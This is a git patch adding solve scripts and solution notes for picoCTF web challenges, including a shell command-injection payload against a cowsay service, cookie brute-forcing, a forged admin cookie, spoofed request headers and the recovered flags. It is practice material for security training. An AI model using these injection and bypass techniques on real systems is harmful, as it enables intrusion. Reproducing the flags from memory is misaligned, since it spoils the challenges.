From 9f5d34fe875257593fb537d8761609b224a17615 Mon Sep 17 00:00:00 2001
From: h7x4 <h7x4@nani.wtf>
Date: Sun, 1 Sep 2024 23:08:46 +0200
Subject: [PATCH] web: add already solved challenges

---
 web/GET_aHEAD/solve.sh                        |  3 ++
 web/caas/solve.py                             | 20 ++++++++
 web/cookies/solve.py                          | 28 ++++++++++
 web/dont-use-client-side/solution.md          | 15 ++++++
 web/findme/solve.sh                           |  4 ++
 .../problem/41511/index.html                  | 37 ++++++++++++++
 .../problem/41511/mycss.css                   | 51 +++++++++++++++++++
 .../problem/41511/myjs.js                     | 21 ++++++++
 web/login/solve.sh                            | 24 +++++++++
 web/logon/solve.sh                            |  4 ++
 web/match_the_regex/solution.md               | 16 ++++++
 web/picobrowser/solve.sh                      |  3 ++
 web/scavenger/DS-store-part.txt               |  1 +
 web/scavenger/css-part.txt                    |  1 +
 web/scavenger/htaccess-part.txt               |  1 +
 web/scavenger/html-part.txt                   |  1 +
 web/scavenger/robots-part.txt                 |  1 +
 web/scavenger/solve.sh                        |  4 ++
 web/where_are_the_robots/solve.sh             |  5 ++
 web/who-are-you/solve.sh                      | 11 ++++
 20 files changed, 251 insertions(+)
 create mode 100755 web/GET_aHEAD/solve.sh
 create mode 100755 web/caas/solve.py
 create mode 100755 web/cookies/solve.py
 create mode 100644 web/dont-use-client-side/solution.md
 create mode 100755 web/findme/solve.sh
 create mode 100644 web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/index.html
 create mode 100644 web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/mycss.css
 create mode 100644 web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/myjs.js
 create mode 100755 web/login/solve.sh
 create mode 100755 web/logon/solve.sh
 create mode 100644 web/match_the_regex/solution.md
 create mode 100755 web/picobrowser/solve.sh
 create mode 100644 web/scavenger/DS-store-part.txt
 create mode 100644 web/scavenger/css-part.txt
 create mode 100644 web/scavenger/htaccess-part.txt
 create mode 100644 web/scavenger/html-part.txt
 create mode 100644 web/scavenger/robots-part.txt
 create mode 100755 web/scavenger/solve.sh
 create mode 100755 web/where_are_the_robots/solve.sh
 create mode 100755 web/who-are-you/solve.sh

diff --git a/web/GET_aHEAD/solve.sh b/web/GET_aHEAD/solve.sh
new file mode 100755
index 0000000..9edb3ae
--- /dev/null
+++ b/web/GET_aHEAD/solve.sh
@@ -0,0 +1,3 @@
+#!/usr/bin/env bash
+
+curl --head "http://mercury.picoctf.net:53554/" | grep -o "picoCTF{.*}"
diff --git a/web/caas/solve.py b/web/caas/solve.py
new file mode 100755
index 0000000..a4c6ca4
--- /dev/null
+++ b/web/caas/solve.py
@@ -0,0 +1,20 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3Packages.requests
+# coding: utf-8
+
+import json
+
+import requests
+
+BASE_URL = "https://caas.mars.picoctf.net/cowsay"
+
+def main():
+    # payload = "$(ls)"
+    payload = "$(cat falg.txt)"
+    r = requests.get(BASE_URL + f"/{payload}")
+    print(r)
+    print(r.text)
+
+if __name__ == '__main__':
+    main()
+
diff --git a/web/cookies/solve.py b/web/cookies/solve.py
new file mode 100755
index 0000000..59ee27b
--- /dev/null
+++ b/web/cookies/solve.py
@@ -0,0 +1,28 @@
+#!/usr/bin/env nix-shell
+#!nix-shell -i python3 -p python3Packages.requests
+# coding: utf-8
+
+import json
+
+import requests
+
+BASE_URL = "http://mercury.picoctf.net:6418/check"
+
+def main():
+    for n in range(100):
+        r = requests.get(
+            BASE_URL,
+            cookies = {
+                'name': str(n),
+            },
+        )
+
+        print(r)
+        if "pico" in r.text:
+            print(r.text)
+            break
+        # print(r.text.split('\n')[41])
+
+if __name__ == '__main__':
+    main()
+
diff --git a/web/dont-use-client-side/solution.md b/web/dont-use-client-side/solution.md
new file mode 100644
index 0000000..acd5e9b
--- /dev/null
+++ b/web/dont-use-client-side/solution.md
@@ -0,0 +1,15 @@
+```javascript
+<...>
+    if (checkpass.substring(0, split) == 'pico') {
+      if (checkpass.substring(split*6, split*7) == 'a3c8') {
+        if (checkpass.substring(split, split*2) == 'CTF{') {
+         if (checkpass.substring(split*4, split*5) == 'ts_p') {
+          if (checkpass.substring(split*3, split*4) == 'lien') {
+            if (checkpass.substring(split*5, split*6) == 'lz_1') {
+              if (checkpass.substring(split*2, split*3) == 'no_c') {
+                if (checkpass.substring(split*7, split*8) == '9}') {
+                  alert("Password Verified")
+<...>
+```
+`picoCTF{no_clients_plz_1a3c89}`
+
diff --git a/web/findme/solve.sh b/web/findme/solve.sh
new file mode 100755
index 0000000..2ea3c0b
--- /dev/null
+++ b/web/findme/solve.sh
@@ -0,0 +1,4 @@
+#!/usr/bin/env bash
+
+# Taken from redirects
+echo "cGljb0NURntwcm94aWVzX2FsbF90aGVfd2F5XzAxZTc0OGRifQ==" | base64 -d
diff --git a/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/index.html b/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/index.html
new file mode 100644
index 0000000..3be9350
--- /dev/null
+++ b/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/index.html
@@ -0,0 +1,37 @@
+<!doctype html>
+<html>
+  <head>
+    <title>My First Website :)</title>
+    <link href="https://fonts.googleapis.com/css?family=Open+Sans|Roboto" rel="stylesheet">
+    <link rel="stylesheet" type="text/css" href="mycss.css">
+    <script type="application/javascript" src="myjs.js"></script>
+  </head>
+
+  <body>
+    <div class="container">
+      <header>
+	<h1>Inspect Me</h1>
+      </header>
+
+      <button class="tablink" onclick="openTab('tabintro', this, '#222')" id="defaultOpen">What</button>
+      <button class="tablink" onclick="openTab('tababout', this, '#222')">How</button>
+      
+      <div id="tabintro" class="tabcontent">
+	<h3>What</h3>
+	<p>I made a website</p>
+      </div>
+
+      <div id="tababout" class="tabcontent">
+	<h3>How</h3>
+	<p>I used these to make this site: <br/>
+	  HTML <br/>
+	  CSS <br/>
+	  JS (JavaScript)
+	</p>
+	<!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 -->
+      </div>
+      
+    </div>
+    
+  </body>
+</html>
diff --git a/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/mycss.css b/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/mycss.css
new file mode 100644
index 0000000..09be056
--- /dev/null
+++ b/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/mycss.css
@@ -0,0 +1,51 @@
+div.container {
+    width: 100%;
+}
+
+header {
+    background-color: black;
+    padding: 1em;
+    color: white;
+    clear: left;
+    text-align: center;
+}
+
+body {
+    font-family: Roboto;
+}
+
+h1 {
+    color: white;
+}
+
+p {
+    font-family: "Open Sans";
+}
+
+.tablink {
+    background-color: #555;
+    color: white;
+    float: left;
+    border: none;
+    outline: none;
+    cursor: pointer;
+    padding: 14px 16px;
+    font-size: 17px;
+    width: 50%;
+}
+
+.tablink:hover {
+    background-color: #777;
+}
+
+.tabcontent {
+    color: #111;
+    display: none;
+    padding: 50px;
+    text-align: center;
+}
+
+#tabintro { background-color: #ccc; }
+#tababout { background-color: #ccc; }
+
+/* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */
\ No newline at end of file
diff --git a/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/myjs.js b/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/myjs.js
new file mode 100644
index 0000000..133c1bd
--- /dev/null
+++ b/web/insp3ct0r/jupiter.challenges.picoctf.org/problem/41511/myjs.js
@@ -0,0 +1,21 @@
+function openTab(tabName,elmnt,color) {
+    var i, tabcontent, tablinks;
+    tabcontent = document.getElementsByClassName("tabcontent");
+    for (i = 0; i < tabcontent.length; i++) {
+	tabcontent[i].style.display = "none";
+    }
+    tablinks = document.getElementsByClassName("tablink");
+    for (i = 0; i < tablinks.length; i++) {
+	tablinks[i].style.backgroundColor = "";
+    }
+    document.getElementById(tabName).style.display = "block";
+    if(elmnt.style != null) {
+	elmnt.style.backgroundColor = color;
+    }
+}
+
+window.onload = function() {
+    openTab('tabintro', this, '#222');
+}
+
+/* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?832b0699} */
diff --git a/web/login/solve.sh b/web/login/solve.sh
new file mode 100755
index 0000000..a6fbe7b
--- /dev/null
+++ b/web/login/solve.sh
@@ -0,0 +1,24 @@
+#!/usr/bin/env bash
+
+echo "cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ" | base64 -d
+
+# (
+#   async() => {
+#     await new Promise((e => window.addEventListener('load', e))),
+#     document.querySelector('form').addEventListener(
+#       'submit',
+#       (
+#         e => {
+#           e.preventDefault();
+#           const r = {
+#             u: 'input[name=username]',
+#             p: 'input[name=password]'
+#           },
+#           t = {};
+#           for (const e in r) t[e] = btoa(document.querySelector(r[e]).value).replace(/=/g, '');
+#           return 'YWRtaW4' !== t.u ? alert('Incorrect Username') : 'cGljb0NURns1M3J2M3JfNTNydjNyXzUzcnYzcl81M3J2M3JfNTNydjNyfQ' !== t.p ? alert('Incorrect Password') : void alert(`Correct Password! Your flag is ${ atob(t.p) }.`)
+#         }
+#       )
+#     )
+#   }
+# ) ();
diff --git a/web/logon/solve.sh b/web/logon/solve.sh
new file mode 100755
index 0000000..94188df
--- /dev/null
+++ b/web/logon/solve.sh
@@ -0,0 +1,4 @@
+#!/usr/bin/env bash
+
+curl 'https://jupiter.challenges.picoctf.org/problem/13594/flag' -H 'Cookie: admin=True' | grep -o "picoCTF{.*}"
+
diff --git a/web/match_the_regex/solution.md b/web/match_the_regex/solution.md
new file mode 100644
index 0000000..c300125
--- /dev/null
+++ b/web/match_the_regex/solution.md
@@ -0,0 +1,16 @@
+```javascript
+	function send_request() {
+		let val = document.getElementById("name").value;
+		// ^p.....F!?
+		fetch(`/flag?input=${val}`)
+			.then(res => res.text())
+			.then(res => {
+				const res_json = JSON.parse(res);
+				alert(res_json.flag)
+				return false;
+			})
+		return false;
+	}
+```
+
+`picoCTF` -> `picoCTF{succ3ssfully_matchtheregex_f89ea585}`
diff --git a/web/picobrowser/solve.sh b/web/picobrowser/solve.sh
new file mode 100755
index 0000000..36bd6b1
--- /dev/null
+++ b/web/picobrowser/solve.sh
@@ -0,0 +1,3 @@
+#!/usr/bin/env bash
+
+curl 'https://jupiter.challenges.picoctf.org/problem/26704/flag' -H 'User-Agent: picobrowser' | grep -o "picoCTF{.*}"
diff --git a/web/scavenger/DS-store-part.txt b/web/scavenger/DS-store-part.txt
new file mode 100644
index 0000000..acdd95c
--- /dev/null
+++ b/web/scavenger/DS-store-part.txt
@@ -0,0 +1 @@
+_a69684fd}
diff --git a/web/scavenger/css-part.txt b/web/scavenger/css-part.txt
new file mode 100644
index 0000000..8a07b62
--- /dev/null
+++ b/web/scavenger/css-part.txt
@@ -0,0 +1 @@
+h4ts_4_l0
diff --git a/web/scavenger/htaccess-part.txt b/web/scavenger/htaccess-part.txt
new file mode 100644
index 0000000..3283834
--- /dev/null
+++ b/web/scavenger/htaccess-part.txt
@@ -0,0 +1 @@
+3s_2_lO0k
diff --git a/web/scavenger/html-part.txt b/web/scavenger/html-part.txt
new file mode 100644
index 0000000..40a4c0f
--- /dev/null
+++ b/web/scavenger/html-part.txt
@@ -0,0 +1 @@
+picoCTF{t
diff --git a/web/scavenger/robots-part.txt b/web/scavenger/robots-part.txt
new file mode 100644
index 0000000..3a7641f
--- /dev/null
+++ b/web/scavenger/robots-part.txt
@@ -0,0 +1 @@
+t_0f_pl4c
diff --git a/web/scavenger/solve.sh b/web/scavenger/solve.sh
new file mode 100755
index 0000000..0e7572f
--- /dev/null
+++ b/web/scavenger/solve.sh
@@ -0,0 +1,4 @@
+#!/usr/bin/env bash
+
+cat html-part.txt css-part.txt robots-part.txt htaccess-part.txt DS-store-part.txt | tr -d \\n
+
diff --git a/web/where_are_the_robots/solve.sh b/web/where_are_the_robots/solve.sh
new file mode 100755
index 0000000..c764007
--- /dev/null
+++ b/web/where_are_the_robots/solve.sh
@@ -0,0 +1,5 @@
+#!/usr/bin/env bash
+
+curl https://jupiter.challenges.picoctf.org/problem/36474/
+curl https://jupiter.challenges.picoctf.org/problem/36474/robots.txt
+curl https://jupiter.challenges.picoctf.org/problem/36474/477ce.html
diff --git a/web/who-are-you/solve.sh b/web/who-are-you/solve.sh
new file mode 100755
index 0000000..6fbfceb
--- /dev/null
+++ b/web/who-are-you/solve.sh
@@ -0,0 +1,11 @@
+#!/usr/bin/env bash
+
+# https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers
+
+curl 'http://mercury.picoctf.net:39114/' \
+	-H 'User-Agent: PicoBrowser' \
+	-H 'Referer: http://mercury.picoctf.net:39114/' \
+	-H 'Date: Wed, 21 Oct 2018 07:28:00 GMT' \
+	-H 'DNT: 1' \
+	-H 'X-Forwarded-For: 104.123.68.13' \
+	-H 'Accept-Language: sv' | grep -o "picoCTF{.*}"